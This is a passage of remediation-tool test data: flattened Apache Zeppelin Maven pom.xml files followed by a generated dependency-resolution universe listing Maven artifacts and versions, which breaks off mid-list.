com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl com.google.guava guava io.netty netty-all org.eclipse.jetty jetty-util com.fasterxml.jackson.core jackson-annotations commons-logging commons-logging com.fasterxml.jackson.core jackson-databind org.apache.hadoop hadoop-hdfs ${hadoop.version} tests test com.sun.jersey jersey-json com.sun.jersey jersey-client javax.servlet servlet-api org.apache.avro avro org.apache.jackrabbit jackrabbit-webdav io.netty netty commons-httpclient commons-httpclient org.eclipse.jgit org.eclipse.jgit com.jcraft jsch org.apache.commons commons-compress xml-apis xml-apis xerces xercesImpl com.google.guava guava io.netty netty-all org.eclipse.jetty jetty-util com.fasterxml.jackson.core jackson-annotations commons-logging commons-logging log4j log4j com.fasterxml.jackson.core jackson-databind org.apache.hadoop ${hadoop-client-runtime.artifact} ${hadoop.version} ${hadoop.deps.scope} commons-logging commons-logging com.google.code.findbugs jsr305 org.apache.hadoop ${hadoop-client-minicluster.artifact} ${hadoop.version} test org.apache.maven.plugins maven-compiler-plugin ${java.version} ${java.version} org.apache.maven.plugins maven-jar-plugin true lib/ theMainClass org.apache.maven.plugins maven-scm-plugin developerConnection branch-0.1 branch org.apache.maven.plugins maven-enforcer-plugin enforce-dependency-convergence true enforce org.apache.maven.plugins maven-deploy-plugin org.apache.maven.plugins maven-jar-plugin ${plugin.jar.version} org.apache.maven.plugins maven-scm-plugin ${plugin.scm.version} pl.project13.maven git-commit-id-plugin ${plugin.git.commit.id.version} org.apache.maven.plugins maven-enforcer-plugin ${plugin.enforcer.version} org.apache.maven.plugins maven-deploy-plugin ${plugin.deploy.version} org.apache.maven.plugins maven-checkstyle-plugin ${plugin.checkstyle.version} true ${basedir}/src/main/java,${basedir}/src/main/scala ${basedir}/src/test/java zeppelin/checkstyle.xml checkstyle-fail-build check true org/apache/zeppelin/interpreter/thrift/*,org/apache/zeppelin/python/proto/* org.apache.zeppelin build-tools ${project.version} org.apache.maven.plugins maven-clean-plugin ${plugin.clean.version} net.alchim31.maven scala-maven-plugin ${plugin.scala.alchim31.version} all -unchecked -deprecation -feature org.apache.maven.plugins maven-surefire-plugin ${plugin.surefire.version} -Xmx2g -Xms1g -Dfile.encoding=UTF-8 true ${tests.to.exclude} org.apache.maven.plugins maven-assembly-plugin ${plugin.assembly.version} org.codehaus.mojo exec-maven-plugin ${plugin.exec.version} org.codehaus.mojo cobertura-maven-plugin ${plugin.cobertura.version} com.googlecode.maven-download-plugin download-maven-plugin ${plugin.download.version} org.apache.maven.plugins maven-antrun-plugin ${plugin.antrun.version} org.apache.maven.plugins maven-dependency-plugin ${plugin.dependency.version} copy-dependencies process-test-resources copy-dependencies ${project.build.directory}/lib false false true runtime org.scalatest scalatest-maven-plugin ${plugin.scalatest.version} org.codehaus.mojo build-helper-maven-plugin ${plugin.buildhelper.version} com.github.eirslett frontend-maven-plugin ${plugin.frontend.version} org.apache.maven.plugins maven-failsafe-plugin ${plugin.failsafe.version} com.github.os72 protoc-jar-maven-plugin ${plugin.protobuf.version} com.bazaarvoice.maven.plugins s3-upload-maven-plugin ${plugin.s3.upload.version} org.codehaus.mojo buildnumber-maven-plugin ${plugin.buildnumber.version} org.apache.avro avro-maven-plugin ${plugin.avro.version} org.scalatra.scalate maven-scalate-plugin_${scala.binary.version} ${plugin.scalate.version} org.apache.maven.plugins maven-source-plugin ${plugin.source.version} org.apache.maven.plugins maven-javadoc-plugin ${plugin.javadoc.version} org.apache.maven.plugins maven-gpg-plugin ${plugin.gpg.version} org.apache.rat apache-rat-plugin ${plugin.rat.version} web-angular zeppelin-web-angular vendor-repo cloudera https://repository.cloudera.com/artifactory/cloudera-repos/ hortonworks https://repo.hortonworks.com/content/groups/public/ integration zeppelin-integration zeppelin-interpreter-integration examples zeppelin-examples helium-dev helium-dev include-hadoop compile build-distr false org.apache.maven.plugins maven-surefire-plugin true org.apache.maven.plugins maven-assembly-plugin make-assembly package single publish-distr org.apache.maven.plugins maven-surefire-plugin true org.apache.maven.plugins maven-source-plugin attach-sources jar org.apache.maven.plugins maven-javadoc-plugin attach-javadocs jar release-sign-artifacts performRelease true org.apache.maven.plugins maven-gpg-plugin sign-artifacts verify sign rat org.apache.rat apache-rat-plugin **/*.keywords reports/** **/.idea/ **/*.iml .git/ .github/ .gitignore git.properties .repository/ .rat-excludes/ .Rhistory **/*.diff **/*.patch **/*.avsc **/*.avro **/*.log **/*.ipynb **/test/resources/** **/.settings/* **/.factorypath **/.classpath **/.project **/target/** **/derby.log **/metastore_db/ **/logs/** **/run/** interpreter/** **/local-repo/** **/null/** **/notebook/** **/README.md DEPENDENCIES DEPLOY.md STYLE.md Roadmap.md **/licenses/** **/zeppelin-distribution/src/bin_license/** conf/interpreter.json conf/notebook-authorization.json conf/credentials.json conf/zeppelin-env.sh conf/helium.json spark-*-bin*/** .spark-dist/** **/interpreter-setting.json **/constants.json scripts/** **/**/*.log **/**/logs/** **/test/karma.conf.js **/test/spec/** **/.babelrc **/.bowerrc .editorconfig .eslintrc protractor.conf.js **/.tmp/** **/target/** **/node/** **/node_modules/** **/bower_components/** **/dist/** **/.buildignore **/.npmignore **/.jshintrc **/yarn.lock **/bower.json **/src/fonts/Patua-One* **/src/fonts/patua-one* **/src/fonts/Roboto* **/src/fonts/roboto* **/src/fonts/fontawesome* **/src/fonts/font-awesome* **/src/styles/font-awesome* **/src/fonts/Simple-Line* **/src/fonts/simple-line* **/src/fonts/Source-Code-Pro* **/src/fonts/source-code-pro* **/src/**/**.test.js **/e2e/**/**.spec.js package-lock.json **/*.json **/browserslist **/.prettierrc **/.prettierignore **/.editorconfig **/src/**/*.svg **/.gitkeep **/src/main/java/org/apache/zeppelin/jdbc/SqlCompleter.java docs/assets/themes/zeppelin/bootstrap/** docs/assets/themes/zeppelin/css/style.css docs/assets/themes/zeppelin/js/docs.js docs/assets/themes/zeppelin/js/search.js docs/_includes/themes/zeppelin/_jumbotron.html docs/_includes/themes/zeppelin/_navigation.html docs/404.html docs/_config.yml docs/_includes/JB/** docs/_layouts/** docs/_plugins/** docs/atom.xml docs/_includes/themes/zeppelin/default.html docs/_includes/themes/zeppelin/page.html docs/_includes/themes/zeppelin/post.html docs/_includes/themes/zeppelin/settings.yml docs/Rakefile docs/rss.xml docs/sitemap.txt docs/search_data.json **/dependency-reduced-pom.xml docs/assets/themes/zeppelin/js/anchor.min.js docs/assets/themes/zeppelin/js/toc.js docs/assets/themes/zeppelin/js/lunr.min.js docs/assets/themes/zeppelin/css/syntax.css docs/_site/** docs/Gemfile.lock **/package.json zeppelin-jupyter-interpreter/src/main/resources/grpc/jupyter/*.py verify.rat verify check org.apache.maven.plugins maven-checkstyle-plugin aggregate false checkstyle-aggregate zeppelin/checkstyle.xml org/apache/zeppelin/interpreter/thrift/*,org/apache/zeppelin/python/proto/* ================================================ FILE: internal/remediation/testdata/zeppelin-server/pom.xml ================================================ 4.0.0 zeppelin org.apache.zeppelin 0.11.1 ./parent zeppelin-server jar Zeppelin: Server 2.30 1.13 2.1 1.11 4.1.0 2.12.6.1 9.13 2.0.0-M15 2.48.2 1.4.01 2.2 ${project.groupId} zeppelin-zengine ${project.version} com.fasterxml.jackson.core jackson-databind com.sun.jersey jersey-core com.sun.jersey jersey-json com.sun.jersey jersey-server com.fasterxml.jackson.core jackson-core org.ow2.asm asm commons-logging commons-logging org.slf4j slf4j-log4j12 org.slf4j slf4j-reload4j org.slf4j jcl-over-slf4j org.apache.httpcomponents httpclient org.slf4j slf4j-reload4j ch.qos.reload4j reload4j org.slf4j jcl-over-slf4j io.dropwizard.metrics metrics-servlets ${dropwizard.version} com.fasterxml.jackson.core jackson-databind io.micrometer micrometer-registry-prometheus ${micrometer.version} io.micrometer micrometer-registry-jmx ${micrometer.version} io.dropwizard.metrics metrics-jmx io.dropwizard.metrics metrics-jmx ${dropwizard.version} org.glassfish.jersey.core jersey-client ${jersey.version} javax.annotation javax.annotation-api org.glassfish.jersey.containers jersey-container-servlet-core ${jersey.version} org.glassfish.jersey.media jersey-media-json-jackson ${jersey.version} com.fasterxml.jackson.core jackson-annotations com.fasterxml.jackson.core jackson-databind com.fasterxml.jackson.core jackson-core org.glassfish.jersey.inject jersey-hk2 ${jersey.version} org.glassfish.jersey.core jersey-server ${jersey.version} com.fasterxml.jackson.core jackson-databind ${jackson.version} javax.ws.rs javax.ws.rs-api ${javax.ws.rsapi.version} org.bouncycastle bcpkix-jdk15on commons-collections commons-collections org.apache.shiro shiro-core commons-beanutils commons-beanutils commons-beanutils commons-beanutils 1.9.4 commons-logging commons-logging org.apache.shiro shiro-web org.kohsuke libpam4j ${libpam4j.version} net.java.dev.jna jna net.java.dev.jna jna ${jna.version} org.eclipse.jetty jetty-webapp ${jetty.version} org.eclipse.jetty jetty-jmx ${jetty.version} org.eclipse.jetty.websocket javax-websocket-server-impl ${jetty.version} com.google.code.gson gson com.nimbusds nimbus-jose-jwt ${nimbus.version} org.quartz-scheduler quartz ${quartz.scheduler.version} org.apache.directory.server apacheds-kerberos-codec ${kerberos.version} org.apache.zeppelin zeppelin-zengine ${project.version} tests test com.google.guava guava org.junit.jupiter junit-jupiter-engine test org.hamcrest hamcrest ${hamcrest.version} test org.mockito mockito-core test org.objenesis objenesis org.seleniumhq.selenium selenium-java ${selenium.java.version} test org.seleniumhq.selenium selenium-android-driver commons-logging commons-logging xml-apis xml-apis org.eclipse.jetty.websocket websocket-client net.java.dev.jna jna org.apache.commons commons-lang3 com.google.guava guava xml-apis xml-apis ${xml.apis.version} test org.bitbucket.cowwoc diff-match-patch 1.1 maven-failsafe-plugin integration-test verify -Xmx2048m maven-surefire-plugin 1 false -Xmx3g -Xms1g -Dfile.encoding=UTF-8 ${tests.to.exclude} 1 org.apache.maven.plugins maven-jar-plugin test-jar org.apache.maven.plugins maven-dependency-plugin using-source-tree true ../bin using-packaged-distr false ../zeppelin-distribution/target/zeppelin-${project.version}/zeppelin-${project.version}/bin hadoop2 ${hadoop2.7.version} org.apache.hadoop hadoop-common ${hadoop.version} ${hadoop.deps.scope} hadoop3 true ${hadoop3.2.version} hadoop-client-api hadoop-client-runtime org.apache.hadoop ${hadoop-client-runtime.artifact} ${hadoop.version} ${hadoop.deps.scope} ================================================ FILE: internal/remediation/testdata/zeppelin-server/universe.yaml ================================================ # Automatically generated by generate_mock_resolution_universe on 06 Nov 25 09:05 AEDT. DO NOT EDIT. system: Maven schema: | antlr:antlr 2.7.7 aopalliance:aopalliance 1.0 asm:asm 3.1 asm:asm-parent 3.1 cglib:cglib-nodep 2.1_3 ch.qos.reload4j:reload4j 1.2.18.3 Opt|javax.mail:mail@1.4.7 Opt|org.apache.geronimo.specs:geronimo-jms_1.1_spec@1.0 1.2.25 Opt|javax.mail:mail@1.4.7 Opt|org.apache.geronimo.specs:geronimo-jms_1.1_spec@1.0 com.esotericsoftware:kryo 4.0.2 com.esotericsoftware:reflectasm@1.11.3 com.esotericsoftware:minlog@1.3.0 org.objenesis:objenesis@2.5.1 com.esotericsoftware:kryo-parent 4.0.2 com.esotericsoftware:minlog@1.3.0 org.objenesis:objenesis@2.5.1 com.esotericsoftware:minlog 1.3.0 com.esotericsoftware:reflectasm 1.11.3 org.ow2.asm:asm@5.0.4 com.fasterxml.jackson.core:jackson-annotations 2.9.9 2.9.10 2.12.6 2.12.7 com.fasterxml.jackson.core:jackson-core 2.9.9 2.9.10 2.12.6 2.12.7 2.13.0 2.15.0 com.fasterxml.jackson.core:jackson-databind 2.9.9 com.fasterxml.jackson.core:jackson-annotations@2.9.0 com.fasterxml.jackson.core:jackson-core@2.9.9 2.9.10.5 com.fasterxml.jackson.core:jackson-annotations@2.9.10 com.fasterxml.jackson.core:jackson-core@2.9.10 2.12.6.1 com.fasterxml.jackson.core:jackson-annotations@2.12.6 com.fasterxml.jackson.core:jackson-core@2.12.6 2.12.7.1 com.fasterxml.jackson.core:jackson-annotations@2.12.7 com.fasterxml.jackson.core:jackson-core@2.12.7 com.fasterxml.jackson.module:jackson-module-jaxb-annotations 2.9.9 com.fasterxml.jackson.core:jackson-annotations@2.9.0 com.fasterxml.jackson.core:jackson-core@2.9.9 com.fasterxml.jackson.core:jackson-databind@2.9.9 Scope provided|javax.xml.bind:jaxb-api@2.2 com.fasterxml.jackson.module:jackson-modules-base 2.9.9 com.fasterxml.jackson:jackson-base 2.9.9 2.9.10 2.9.10.20200621 2.12.6 2.12.7 2.13.0 2.15.0 com.fasterxml.jackson:jackson-bom 2.9.6 2.9.9 2.9.10 2.9.10.20200621 2.12.6 2.12.7 2.12.7.20240502 2.13.0 2.15.0 2.17.1 com.fasterxml.jackson:jackson-parent 2.9.1.1 2.9.1.2 2.12 2.13 2.15 2.17 com.fasterxml:oss-parent 33 34 41 43 50 58 com.github.eirslett:frontend-plugin-core 1.6 org.codehaus.jackson:jackson-mapper-asl@1.9.13 org.codehaus.jackson:jackson-core-asl@1.9.13 org.apache.commons:commons-compress@1.5 commons-io:commons-io@1.3.2 org.apache.commons:commons-exec@1.3 org.apache.httpcomponents:httpclient@4.5.1 org.codehaus.plexus:plexus-utils@3.0.22 org.slf4j:slf4j-api@1.7.5 com.github.eirslett:frontend-plugins 1.6 com.github.stephenc.jcip:jcip-annotations 1.0-1 com.google.code.findbugs:jsr305 1.3.9 3.0.0 3.0.2 com.google.code.gson:gson 2.3.1 2.8.9 com.google.code.gson:gson-parent 2.8.9 com.google.errorprone:error_prone_annotations 2.0.18 2.1.3 2.18.0 com.google.errorprone:error_prone_parent 2.0.18 2.1.3 2.18.0 com.google.guava:failureaccess 1.0.1 com.google.guava:guava 11.0.2 com.google.code.findbugs:jsr305@1.3.9 Scope provided|com.google.guava:guava-bootstrap@11.0.2 18.0 Opt|com.google.code.findbugs:jsr305@1.3.9 22.0 com.google.code.findbugs:jsr305@1.3.9 com.google.errorprone:error_prone_annotations@2.0.18 com.google.j2objc:j2objc-annotations@1.1 org.codehaus.mojo:animal-sniffer-annotations@1.14 24.1.1-jre com.google.code.findbugs:jsr305@1.3.9 org.checkerframework:checker-compat-qual@2.0.0 com.google.errorprone:error_prone_annotations@2.1.3 com.google.j2objc:j2objc-annotations@1.1 org.codehaus.mojo:animal-sniffer-annotations@1.14 32.0.0-jre com.google.guava:failureaccess@1.0.1 com.google.guava:listenablefuture@9999.0-empty-to-avoid-conflict-with-guava com.google.code.findbugs:jsr305@3.0.2 org.checkerframework:checker-qual@3.33.0 com.google.errorprone:error_prone_annotations@2.18.0 com.google.j2objc:j2objc-annotations@2.8 com.google.guava:guava-parent 11.0.2 18.0 22.0 24.1.1-jre 26.0-android 32.0.0-jre com.google.guava:listenablefuture 9999.0-empty-to-avoid-conflict-with-guava com.google.inject.extensions:extensions-parent 3.0 com.google.inject:guice@3.0 com.google.inject.extensions:guice-servlet 3.0 Scope provided|javax.servlet:servlet-api@2.5 com.google.inject:guice@3.0 com.google.inject:guice 3.0 javax.inject:javax.inject@1 aopalliance:aopalliance@1.0 org.sonatype.sisu.inject:cglib@2.2.1-v20090111 com.google.inject:guice-parent 3.0 com.google.j2objc:j2objc-annotations 1.1 2.8 com.google.protobuf:protobuf-java 2.5.0 com.google:google 1 5 com.googlecode.javaewah:JavaEWAH 0.7.9 1.1.13 1.2.3 com.helger:parent-pom 1.10.8 com.helger:profiler 1.1.1 Scope provided|javax.ws.rs:javax.ws.rs-api@2.1.1 com.ibm.icu:icu4j 59.1 com.jamesmurty.utils:java-xmlbuilder 0.4 com.jcraft:jsch 0.1.53 Opt|com.jcraft:jzlib@1.0.7 0.1.54 Opt|com.jcraft:jzlib@1.0.7 com.mchange:c3p0 0.9.5.4 com.mchange:mchange-commons-java@0.2.15 com.mchange:mchange-commons-java 0.2.15 Opt|com.typesafe:config@1.3.0 Opt|log4j:log4j@[1.2.14,1.2.15),[1.2.140,1.2.150),[1.2.1400,1.2.1500),[1.2.14000,1.2.15000),[1.2.140000,1.2.150000) Opt|org.apache.logging.log4j:log4j-api@2.7 Opt|org.apache.logging.log4j:log4j-core@2.7 Opt|org.slf4j:slf4j-api@[1.7.5,1.7.6),[1.7.50,1.7.60),[1.7.500,1.7.600),[1.7.5000,1.7.6000),[1.7.50000,1.7.60000) com.nimbusds:nimbus-jose-jwt 9.13 com.github.stephenc.jcip:jcip-annotations@1.0-1 Opt|org.bouncycastle:bcprov-jdk15on@1.68 Opt|org.bouncycastle:bc-fips@[1.0.2,2.0.0) Opt|org.bouncycastle:bcpkix-jdk15on@1.68 Opt|com.google.crypto.tink:tink@1.5.0 9.37.2 com.github.stephenc.jcip:jcip-annotations@1.0-1 Opt|org.bouncycastle:bcprov-jdk15on@1.70 Opt|org.bouncycastle:bcutil-jdk15on@1.70 Opt|org.bouncycastle:bc-fips@[1.0.2,2.0.0) Opt|org.bouncycastle:bcpkix-jdk15on@1.70 Opt MavenExclusions com.google.protobuf:protobuf-java,com.google.code.gson:gson|com.google.crypto.tink:tink@1.10.0 9.37.4 com.github.stephenc.jcip:jcip-annotations@1.0-1 Opt|org.bouncycastle:bcprov-jdk18on@1.81 Opt|org.bouncycastle:bcutil-jdk18on@1.81 Opt|org.bouncycastle:bc-fips@[1.0.2,2.0.0) Opt|org.bouncycastle:bcpkix-jdk18on@1.81 Opt MavenExclusions com.google.protobuf:protobuf-java,com.google.code.gson:gson|com.google.crypto.tink:tink@1.16.0 com.openhtmltopdf:openhtmltopdf-core 1.0.0 com.openhtmltopdf:openhtmltopdf-jsoup-dom-converter 1.0.0 org.jsoup:jsoup@1.11.3 com.openhtmltopdf:openhtmltopdf-parent 1.0.0 com.openhtmltopdf:openhtmltopdf-pdfbox 1.0.0 org.apache.pdfbox:pdfbox@2.0.16 org.apache.pdfbox:xmpbox@2.0.16 com.openhtmltopdf:openhtmltopdf-core@1.0.0 de.rototor.pdfbox:graphics2d@0.24 com.openhtmltopdf:openhtmltopdf-rtl-support 1.0.0 com.ibm.icu:icu4j@59.1 com.openhtmltopdf:openhtmltopdf-core@1.0.0 com.sun.activation:all 1.2.1 com.sun.activation:jakarta.activation 1.2.1 com.sun.jersey.contribs:jersey-contribs 1.9 com.sun.jersey.contribs:jersey-guice 1.9 Scope provided|javax.servlet:servlet-api@2.5 javax.inject:javax.inject@1 com.google.inject:guice@3.0 com.google.inject.extensions:guice-servlet@3.0 com.sun.jersey:jersey-server@1.9 com.sun.jersey:jersey-client 1.9 Scope provided|org.osgi:osgi_R4_core@1.0 com.sun.jersey:jersey-core@1.9 com.sun.jersey:jersey-core 1.9 Scope provided|javax.ws.rs:jsr311-api@1.1.1 Scope provided|javax.mail:mail@1.4 Scope provided|javax.xml.bind:jaxb-api@2.1 Scope provided|org.osgi:osgi_R4_core@1.0 com.sun.jersey:jersey-json 1.9 org.codehaus.jettison:jettison@1.1 com.sun.xml.bind:jaxb-impl@2.2.3-1 org.codehaus.jackson:jackson-core-asl@1.8.3 org.codehaus.jackson:jackson-mapper-asl@1.8.3 org.codehaus.jackson:jackson-jaxrs@1.8.3 org.codehaus.jackson:jackson-xc@1.8.3 com.sun.jersey:jersey-core@1.9 com.sun.jersey:jersey-project 1.9 com.sun.jersey:jersey-server 1.9 asm:asm@3.1 Scope provided|javax.persistence:persistence-api@1.0 Scope provided|javax.mail:mail@1.4 Scope provided|javax.xml.bind:jaxb-api@2.1 Scope provided|javax.servlet:javax.servlet-api@3.0.1 Scope provided|javax.servlet:jsp-api@2.0 Scope provided|org.glassfish:javax.ejb@3.1 Scope provided|org.jboss.weld:weld-osgi-bundle@1.1.0.Final Scope provided|ant:ant@1.6.5 Scope provided|org.osgi:osgi_R4_core@1.0 com.sun.jersey:jersey-core@1.9 com.sun.xml.bind:jaxb-impl 2.2.3-1 javax.xml.bind:jaxb-api@2.2.2 com.thoughtworks.paranamer:paranamer 2.3 Opt|javax.inject:javax.inject@1 com.thoughtworks.paranamer:paranamer-parent 2.3 com.typesafe:config 1.3.2 com.vladsch.flexmark:flexmark 0.62.2 com.vladsch.flexmark:flexmark-util-ast@0.62.2 com.vladsch.flexmark:flexmark-util-builder@0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-dependency@0.62.2 com.vladsch.flexmark:flexmark-util-format@0.62.2 com.vladsch.flexmark:flexmark-util-html@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 com.vladsch.flexmark:flexmark-util-visitor@0.62.2 com.vladsch.flexmark:flexmark-all 0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-abbreviation@0.62.2 com.vladsch.flexmark:flexmark-ext-admonition@0.62.2 com.vladsch.flexmark:flexmark-ext-anchorlink@0.62.2 com.vladsch.flexmark:flexmark-ext-aside@0.62.2 com.vladsch.flexmark:flexmark-ext-attributes@0.62.2 com.vladsch.flexmark:flexmark-ext-autolink@0.62.2 com.vladsch.flexmark:flexmark-ext-definition@0.62.2 com.vladsch.flexmark:flexmark-ext-emoji@0.62.2 com.vladsch.flexmark:flexmark-ext-enumerated-reference@0.62.2 com.vladsch.flexmark:flexmark-ext-escaped-character@0.62.2 com.vladsch.flexmark:flexmark-ext-footnotes@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-issues@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-strikethrough@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-tasklist@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-users@0.62.2 com.vladsch.flexmark:flexmark-ext-gitlab@0.62.2 com.vladsch.flexmark:flexmark-ext-jekyll-front-matter@0.62.2 com.vladsch.flexmark:flexmark-ext-jekyll-tag@0.62.2 com.vladsch.flexmark:flexmark-ext-media-tags@0.62.2 com.vladsch.flexmark:flexmark-ext-macros@0.62.2 com.vladsch.flexmark:flexmark-ext-ins@0.62.2 com.vladsch.flexmark:flexmark-ext-xwiki-macros@0.62.2 com.vladsch.flexmark:flexmark-ext-superscript@0.62.2 com.vladsch.flexmark:flexmark-ext-tables@0.62.2 com.vladsch.flexmark:flexmark-ext-toc@0.62.2 com.vladsch.flexmark:flexmark-ext-typographic@0.62.2 com.vladsch.flexmark:flexmark-ext-wikilink@0.62.2 com.vladsch.flexmark:flexmark-ext-yaml-front-matter@0.62.2 com.vladsch.flexmark:flexmark-ext-youtube-embedded@0.62.2 com.vladsch.flexmark:flexmark-html2md-converter@0.62.2 com.vladsch.flexmark:flexmark-jira-converter@0.62.2 com.vladsch.flexmark:flexmark-pdf-converter@0.62.2 com.vladsch.flexmark:flexmark-profile-pegdown@0.62.2 com.vladsch.flexmark:flexmark-util-ast@0.62.2 com.vladsch.flexmark:flexmark-util-builder@0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-dependency@0.62.2 com.vladsch.flexmark:flexmark-util-format@0.62.2 com.vladsch.flexmark:flexmark-util-html@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-options@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 com.vladsch.flexmark:flexmark-util-visitor@0.62.2 com.vladsch.flexmark:flexmark-youtrack-converter@0.62.2 com.vladsch.flexmark:flexmark-ext-abbreviation 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark-ext-autolink@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-admonition 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-anchorlink 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-aside 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-jira-converter@0.62.2 com.vladsch.flexmark:flexmark-ext-attributes 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-autolink 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 org.nibor.autolink:autolink@0.6.0 com.vladsch.flexmark:flexmark-ext-definition 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-emoji 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-jira-converter@0.62.2 com.vladsch.flexmark:flexmark-ext-enumerated-reference 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-attributes@0.62.2 com.vladsch.flexmark:flexmark-ext-escaped-character 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-footnotes 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-issues 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-strikethrough 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-tasklist 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-users 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gitlab 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-ins 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-jekyll-front-matter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-yaml-front-matter@0.62.2 com.vladsch.flexmark:flexmark-ext-jekyll-tag 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-macros 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gitlab@0.62.2 com.vladsch.flexmark:flexmark-ext-media-tags 0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-superscript 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-tables 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-toc 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-typographic 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-wikilink 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-xwiki-macros 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-yaml-front-matter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-youtube-embedded 0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-html2md-converter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-emoji@0.62.2 org.jsoup:jsoup@1.11.3 com.vladsch.flexmark:flexmark-java 0.62.2 com.vladsch.flexmark:flexmark-jira-converter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-strikethrough@0.62.2 com.vladsch.flexmark:flexmark-ext-tables@0.62.2 com.vladsch.flexmark:flexmark-ext-wikilink@0.62.2 com.vladsch.flexmark:flexmark-ext-ins@0.62.2 com.vladsch.flexmark:flexmark-ext-superscript@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-pdf-converter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 org.jsoup:jsoup@1.11.3 com.openhtmltopdf:openhtmltopdf-core@1.0.0 com.openhtmltopdf:openhtmltopdf-pdfbox@1.0.0 com.openhtmltopdf:openhtmltopdf-rtl-support@1.0.0 com.openhtmltopdf:openhtmltopdf-jsoup-dom-converter@1.0.0 com.vladsch.flexmark:flexmark-profile-pegdown 0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-abbreviation@0.62.2 com.vladsch.flexmark:flexmark-ext-anchorlink@0.62.2 com.vladsch.flexmark:flexmark-ext-aside@0.62.2 com.vladsch.flexmark:flexmark-ext-autolink@0.62.2 